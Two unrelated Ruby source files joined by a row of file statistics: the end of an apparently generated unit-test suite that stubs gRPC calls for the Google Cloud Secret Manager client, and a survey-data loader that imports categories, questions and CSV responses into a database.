client.create_secret({ parent: parent, secret_id: secret_id, secret: secret }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.create_secret(::Google::Cloud::SecretManager::V1beta1::CreateSecretRequest.new(parent: parent, secret_id: secret_id, secret: secret), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, create_secret_client_stub.call_rpc_count
end
end
def test_add_secret_version
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::SecretVersion.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
payload = {}
add_secret_version_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :add_secret_version, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::AddSecretVersionRequest, request
assert_equal "hello world", request["parent"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::SecretManager::V1beta1::SecretPayload), request["payload"]
refute_nil options
end
Gapic::ServiceStub.stub :new, add_secret_version_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.add_secret_version({ parent: parent, payload: payload }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.add_secret_version parent: parent, payload: payload do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.add_secret_version ::Google::Cloud::SecretManager::V1beta1::AddSecretVersionRequest.new(parent: parent, payload: payload) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.add_secret_version({ parent: parent, payload: payload }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.add_secret_version(::Google::Cloud::SecretManager::V1beta1::AddSecretVersionRequest.new(parent: parent, payload: payload), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, add_secret_version_client_stub.call_rpc_count
end
end
def test_get_secret
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::Secret.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
name = "hello world"
get_secret_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :get_secret, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::GetSecretRequest, request
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, get_secret_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.get_secret({ name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.get_secret name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.get_secret ::Google::Cloud::SecretManager::V1beta1::GetSecretRequest.new(name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.get_secret({ name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.get_secret(::Google::Cloud::SecretManager::V1beta1::GetSecretRequest.new(name: name), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, get_secret_client_stub.call_rpc_count
end
end
def test_update_secret
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::Secret.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
secret = {}
update_mask = {}
update_secret_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :update_secret, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::UpdateSecretRequest, request
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::SecretManager::V1beta1::Secret), request["secret"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Protobuf::FieldMask), request["update_mask"]
refute_nil options
end
Gapic::ServiceStub.stub :new, update_secret_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.update_secret({ secret: secret, update_mask: update_mask }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.update_secret secret: secret, update_mask: update_mask do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.update_secret ::Google::Cloud::SecretManager::V1beta1::UpdateSecretRequest.new(secret: secret, update_mask: update_mask) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.update_secret({ secret: secret, update_mask: update_mask }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.update_secret(::Google::Cloud::SecretManager::V1beta1::UpdateSecretRequest.new(secret: secret, update_mask: update_mask), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, update_secret_client_stub.call_rpc_count
end
end
def test_delete_secret
# Create GRPC objects.
grpc_response = ::Google::Protobuf::Empty.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
name = "hello world"
delete_secret_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :delete_secret, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::DeleteSecretRequest, request
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, delete_secret_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.delete_secret({ name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.delete_secret name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.delete_secret ::Google::Cloud::SecretManager::V1beta1::DeleteSecretRequest.new(name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.delete_secret({ name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.delete_secret(::Google::Cloud::SecretManager::V1beta1::DeleteSecretRequest.new(name: name), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, delete_secret_client_stub.call_rpc_count
end
end
def test_list_secret_versions
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::ListSecretVersionsResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
page_size = 42
page_token = "hello world"
list_secret_versions_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :list_secret_versions, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::ListSecretVersionsRequest, request
assert_equal "hello world", request["parent"]
assert_equal 42, request["page_size"]
assert_equal "hello world", request["page_token"]
refute_nil options
end
Gapic::ServiceStub.stub :new, list_secret_versions_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.list_secret_versions({ parent: parent, page_size: page_size, page_token: page_token }) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use named arguments
client.list_secret_versions parent: parent, page_size: page_size, page_token: page_token do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.list_secret_versions ::Google::Cloud::SecretManager::V1beta1::ListSecretVersionsRequest.new(parent: parent, page_size: page_size, page_token: page_token) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.list_secret_versions({ parent: parent, page_size: page_size, page_token: page_token }, grpc_options) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.list_secret_versions(::Google::Cloud::SecretManager::V1beta1::ListSecretVersionsRequest.new(parent: parent, page_size: page_size, page_token: page_token), grpc_options) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, list_secret_versions_client_stub.call_rpc_count
end
end
def test_get_secret_version
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::SecretVersion.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
name = "hello world"
get_secret_version_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :get_secret_version, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::GetSecretVersionRequest, request
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, get_secret_version_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.get_secret_version({ name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.get_secret_version name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.get_secret_version ::Google::Cloud::SecretManager::V1beta1::GetSecretVersionRequest.new(name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.get_secret_version({ name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.get_secret_version(::Google::Cloud::SecretManager::V1beta1::GetSecretVersionRequest.new(name: name), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, get_secret_version_client_stub.call_rpc_count
end
end
def test_access_secret_version
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::AccessSecretVersionResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
name = "hello world"
access_secret_version_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :access_secret_version, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::AccessSecretVersionRequest, request
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, access_secret_version_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.access_secret_version({ name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.access_secret_version name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.access_secret_version ::Google::Cloud::SecretManager::V1beta1::AccessSecretVersionRequest.new(name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.access_secret_version({ name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.access_secret_version(::Google::Cloud::SecretManager::V1beta1::AccessSecretVersionRequest.new(name: name), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, access_secret_version_client_stub.call_rpc_count
end
end
def test_disable_secret_version
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::SecretVersion.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
name = "hello world"
disable_secret_version_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :disable_secret_version, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::DisableSecretVersionRequest, request
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, disable_secret_version_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.disable_secret_version({ name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.disable_secret_version name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.disable_secret_version ::Google::Cloud::SecretManager::V1beta1::DisableSecretVersionRequest.new(name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.disable_secret_version({ name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.disable_secret_version(::Google::Cloud::SecretManager::V1beta1::DisableSecretVersionRequest.new(name: name), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, disable_secret_version_client_stub.call_rpc_count
end
end
def test_enable_secret_version
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::SecretVersion.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
name = "hello world"
enable_secret_version_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :enable_secret_version, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::EnableSecretVersionRequest, request
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, enable_secret_version_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.enable_secret_version({ name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.enable_secret_version name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.enable_secret_version ::Google::Cloud::SecretManager::V1beta1::EnableSecretVersionRequest.new(name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.enable_secret_version({ name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.enable_secret_version(::Google::Cloud::SecretManager::V1beta1::EnableSecretVersionRequest.new(name: name), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, enable_secret_version_client_stub.call_rpc_count
end
end
def test_destroy_secret_version
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::SecretVersion.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
name = "hello world"
destroy_secret_version_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :destroy_secret_version, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::DestroySecretVersionRequest, request
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, destroy_secret_version_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.destroy_secret_version({ name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.destroy_secret_version name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.destroy_secret_version ::Google::Cloud::SecretManager::V1beta1::DestroySecretVersionRequest.new(name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.destroy_secret_version({ name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.destroy_secret_version(::Google::Cloud::SecretManager::V1beta1::DestroySecretVersionRequest.new(name: name), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, destroy_secret_version_client_stub.call_rpc_count
end
end
def test_set_iam_policy
# Create GRPC objects.
grpc_response = ::Google::Iam::V1::Policy.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
resource = "hello world"
policy = {}
set_iam_policy_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :set_iam_policy, name
assert_kind_of ::Google::Iam::V1::SetIamPolicyRequest, request
assert_equal "hello world", request["resource"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Iam::V1::Policy), request["policy"]
refute_nil options
end
Gapic::ServiceStub.stub :new, set_iam_policy_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.set_iam_policy({ resource: resource, policy: policy }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.set_iam_policy resource: resource, policy: policy do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.set_iam_policy ::Google::Iam::V1::SetIamPolicyRequest.new(resource: resource, policy: policy) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.set_iam_policy({ resource: resource, policy: policy }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.set_iam_policy(::Google::Iam::V1::SetIamPolicyRequest.new(resource: resource, policy: policy), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, set_iam_policy_client_stub.call_rpc_count
end
end
def test_get_iam_policy
# Create GRPC objects.
grpc_response = ::Google::Iam::V1::Policy.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
resource = "hello world"
options = {}
get_iam_policy_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :get_iam_policy, name
assert_kind_of ::Google::Iam::V1::GetIamPolicyRequest, request
assert_equal "hello world", request["resource"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Iam::V1::GetPolicyOptions), request["options"]
refute_nil options
end
Gapic::ServiceStub.stub :new, get_iam_policy_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.get_iam_policy({ resource: resource, options: options }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.get_iam_policy resource: resource, options: options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.get_iam_policy ::Google::Iam::V1::GetIamPolicyRequest.new(resource: resource, options: options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.get_iam_policy({ resource: resource, options: options }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.get_iam_policy(::Google::Iam::V1::GetIamPolicyRequest.new(resource: resource, options: options), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, get_iam_policy_client_stub.call_rpc_count
end
end
def test_test_iam_permissions
# Create GRPC objects.
grpc_response = ::Google::Iam::V1::TestIamPermissionsResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
resource = "hello world"
permissions = ["hello world"]
test_iam_permissions_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :test_iam_permissions, name
assert_kind_of ::Google::Iam::V1::TestIamPermissionsRequest, request
assert_equal "hello world", request["resource"]
assert_equal ["hello world"], request["permissions"]
refute_nil options
end
Gapic::ServiceStub.stub :new, test_iam_permissions_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.test_iam_permissions({ resource: resource, permissions: permissions }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.test_iam_permissions resource: resource, permissions: permissions do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.test_iam_permissions ::Google::Iam::V1::TestIamPermissionsRequest.new(resource: resource, permissions: permissions) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.test_iam_permissions({ resource: resource, permissions: permissions }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.test_iam_permissions(::Google::Iam::V1::TestIamPermissionsRequest.new(resource: resource, permissions: permissions), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, test_iam_permissions_client_stub.call_rpc_count
end
end
def test_configure
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
client = block_config = config = nil
Gapic::ServiceStub.stub :new, nil do
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
end
config = client.configure do |c|
block_config = c
end
assert_same block_config, config
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client::Configuration, config
end
end
| 39.97732 | 206 | 0.720718 |
031326d5bdca7fdb4b9ea5f32d45c68204aa727f | 10,962 | require 'csv'
class ResponseLoader
def load_categories
puts 'start'
measures = JSON.parse(File.read(File.expand_path('../../../data/measures.json', __FILE__)))
puts "Loaded #{measures.length} measures"
measures.each_with_index do |measure, index|
category = Category.create(
name: measure['title'],
blurb: measure['blurb'],
description: measure['text'],
external_id: measure['id'] || index + 1
)
measure['sub'].keys.sort.each do |key|
subinfo = measure['sub'][key]
subcategory = category.child_categories.create(
name: subinfo['title'],
blurb: subinfo['blurb'],
description: subinfo['text'],
external_id: key
)
subinfo['measures'].keys.sort.each do |subinfo_key|
subsubinfo = subinfo['measures'][subinfo_key]
subsubcategory = subcategory.child_categories.create(
name: subsubinfo['title'],
blurb: subsubinfo['blurb'],
description: subsubinfo['text'],
external_id: subinfo_key
)
# if subsubinfo['nonlikert'].present?
# subsubinfo['nonlikert'].each do |nonlikert_info|
# next unless nonlikert_info['likert'].present?
# nonlikert = subsubcategory.child_measures.create(
# name: nonlikert_info['title'],
# description: nonlikert_info['benchmark_explanation'],
# benchmark: nonlikert_info['benchmark']
# )
#
# name_map = {
# "argenziano": "dr-albert-f-argenziano-school-at-lincoln-park",
# "healey": "arthur-d-healey-school",
# "brown": "benjamin-g-brown-school",
# "east": "east-somerville-community-school",
# "kennedy": "john-f-kennedy-elementary-school",
# "somervillehigh": "somerville-high-school",
# "west": "west-somerville-neighborhood-school",
# "winter": "winter-hill-community-innovation-school"
# }
#
# nonlikert_info['likert'].each do |key, likert|
# school_name = name_map[key.to_sym]
# next if school_name.nil?
# school = School.friendly.find(school_name)
# nonlikert.measurements.create(school: school, likert: likert, nonlikert: nonlikert_info['values'][key])
# end
# end
# end
end
end
end
end
def load_questions
variations = [
'[Field-MathTeacher][Field-ScienceTeacher][Field-EnglishTeacher][Field-SocialTeacher]',
'teacher'
]
questions = JSON.parse(File.read(File.expand_path('../../../data/questions.json', __FILE__)))
questions.each do |question|
category = nil
question['category'].split('-').each do |external_id|
categories = category.present? ? category.child_categories : Category
category = categories.where(external_id: external_id).first
if category.nil?
puts 'NOTHING'
puts external_id
puts categories.inspect
end
end
question_text = question['text'].gsub(/[[:space:]]/, ' ').strip
if question_text.index('.* teacher').nil?
category.questions.create(
text: question_text,
option1: question['answers'][0],
option2: question['answers'][1],
option3: question['answers'][2],
option4: question['answers'][3],
option5: question['answers'][4],
for_recipient_students: question['child'].present?
)
else
variations.each do |variation|
category.questions.create(
text: question_text.gsub('.* teacher', variation),
option1: question['answers'][0],
option2: question['answers'][1],
option3: question['answers'][2],
option4: question['answers'][3],
option5: question['answers'][4],
for_recipient_students: question['child'].present?
)
end
end
end
end
# options[:school_names_whitelist] can be passed to
# only select particular school names
def load_responses(options = {})
ENV['BULK_PROCESS'] = 'true'
answer_dictionary = {
'Slightly': 'Somewhat',
'an incredible': 'a tremendous',
'a little': 'a little bit',
'slightly': 'somewhat',
'a little well': 'slightly well',
'quite': 'very',
'a tremendous': 'a very great',
'somewhat clearly': 'somewhat',
'almost never': 'once in a while',
'always': 'all the time',
'not at all strong': 'not strong at all',
'each': 'every'
}
respondent_map = {}
unknown_schools = {}
missing_questions = {}
bad_answers = {}
year = '2017'
timeToRun = 100 * 60 * 60
startIndex = 0
stopIndex = 100000
startTime = Time.new
['student_responses', 'teacher_responses'].each do |file|
recipients = file.split('_')[0]
target_group = Question.target_groups["for_#{recipients}s"]
filepath = File.expand_path("../../../data/#{file}_#{year}.csv", __FILE__)
csv_string = File.read(filepath)
csv = CSV.parse(csv_string, :headers => true)
puts
puts
puts("LOADING CSV: #{filepath}...")
puts("LOADING CSV: #{csv.length} ROWS")
t = Time.new
csv.each_with_index do |row, index|
next if index < startIndex
if Time.new - startTime >= timeToRun || index > stopIndex
puts("ENDING #{timeToRun} SECONDS: #{Time.new - startTime} = #{startIndex} -> #{index} = #{index - startIndex} or #{(Time.new - t) / (index - startIndex)} per second")
break
end
if index % 10 == 0
puts("DATAMSG: PROCESSING ROW: #{index} OUT OF #{csv.length} ROWS: #{Time.new - t} - Total: #{Time.new - startTime} - #{timeToRun - (Time.new - startTime)} TO GO / #{stopIndex - startIndex} ROWS TO GO")
t = Time.new
end
district_name = row['What district is your school in?']
district_name = row['To begin, please select your district.'] if district_name.nil?
district = District.find_or_create_by(name: district_name, state_id: 1)
school_name = row["Please select your school in #{district_name}."]
# Allow selecting particular school names
if options[:school_names_whitelist]
next unless options[:school_names_whitelist].include?(school_name)
end
if school_name.blank?
# puts "BLANK SCHOOL NAME: #{district.name} - #{index}"
next
end
school = district.schools.find_or_create_by(name: school_name)
if school.nil?
next if unknown_schools[school_name]
puts "DATAERROR: Unable to find school: #{school_name} - #{index}"
unknown_schools[school_name] = true
next
end
respondent_id = row['Response ID']
recipient_id = respondent_map[respondent_id]
if recipient_id.present?
recipient = school.recipients.where(id: recipient_id).first
else
begin
recipient = school.recipients.create(
name: "Survey Respondent Id: #{respondent_id}"
)
rescue
puts "DATAERROR: INDEX: #{index} ERROR AT #{index} - #{district.name} - #{school_name} #{school}: #{respondent_id}"
end
respondent_map[respondent_id] = recipient.id
end
recipient_list = school.recipient_lists.find_by_name("#{recipients.titleize} List")
if recipient_list.nil?
recipient_list = school.recipient_lists.create(name: "#{recipients.titleize} List")
end
recipient_list.recipient_id_array << recipient.id
recipient_list.save!
row.each do |key, value|
t1 = Time.new
next if value.nil? or key.nil? or value.to_s == "-99"
key = key.gsub(/[[:space:]]/, ' ').strip.gsub(/\s+/, ' ')
value = value.gsub(/[[:space:]]/, ' ').strip.downcase
begin
question = Question.find_by_text(key)
rescue Exception => e
puts "DATAERROR: INDEX: #{index} Failed finding question: #{key} -> #{e}"
end
if question.nil?
next if missing_questions[key]
puts "DATAERROR: Unable to find question: #{key}"
missing_questions[key] = true
next
else
question.update_attributes(target_group: target_group) if question.unknown?
end
if (value.to_i.blank?)
answer_index = question.option_index(value)
answer_dictionary.each do |k, v|
break if answer_index.present?
answer_index = question.option_index(value.gsub(k.to_s, v.to_s))
answer_index = question.option_index(value.gsub(v.to_s, k.to_s)) if answer_index.nil?
end
if answer_index.nil?
next if bad_answers[key]
puts "DATAERROR: Unable to find answer: #{key} = #{value.downcase.strip} - #{question.options.inspect}"
bad_answers[key] = true
next
end
else
answer_index = value.to_i
end
responded_at = Date.strptime(row['End Date'], '%m/%d/%Y %H:%M')
begin
recipient.attempts.create(question: question, answer_index: answer_index, responded_at: responded_at)
rescue Exception => e
puts "DATAERROR: INDEX: #{index} Attempt failed for #{recipient.inspect} -> QUESTION: #{question.inspect}, ANSWER_INDEX: #{answer_index}, RESPONDED_AT: #{responded_at}, ERROR: #{e}"
next
end
end
end
end
ENV.delete('BULK_PROCESS')
puts 'Done bulk processing of CSV files.'
puts
puts
puts('LOAD: Creating SchoolCategory models and aggregates...')
categories = Category.all
